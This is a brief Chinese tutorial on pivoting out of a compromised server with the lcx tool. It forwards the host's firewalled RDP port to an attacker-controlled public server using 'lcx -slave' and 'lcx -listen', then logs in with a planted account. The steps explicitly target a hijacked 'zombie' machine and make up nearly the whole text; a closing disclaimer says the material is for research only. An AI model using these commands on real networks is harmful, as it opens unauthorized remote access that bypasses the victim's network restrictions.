0x00 简单介绍

0x01 使用场景

拿到权限后，内网3389端口未开启外连，只允许内网访问，此时可以利用lcx进行突破，将流量转发到公网的端口上。

0x02 简单演示

1、权限很高，system权限，在拿下某台服务器时发现其3389端口开放，但并不允许外连。

2、上传lcx到可读写目录，然后执行lcx -slave 公网ip 公网端口 肉鸡内网地址 肉鸡远程端口(默认3389)

3、执行后可以使用netstat -ano|findstr 9999 查看是否成功，这里使用的是9999端口，可以看到执行成功。

4、此时登录你的公网服务器，然后本地监听并转发到别的端口即可lcx.exe -listen 9999 63389

5、然后远程连接自己的公网服务器ip 63389端口，用创建的用户登录即可

好了，今天的分享就到这里，大佬勿喷。

本教程仅用来交流研究，请勿非法测试，否则后果自负。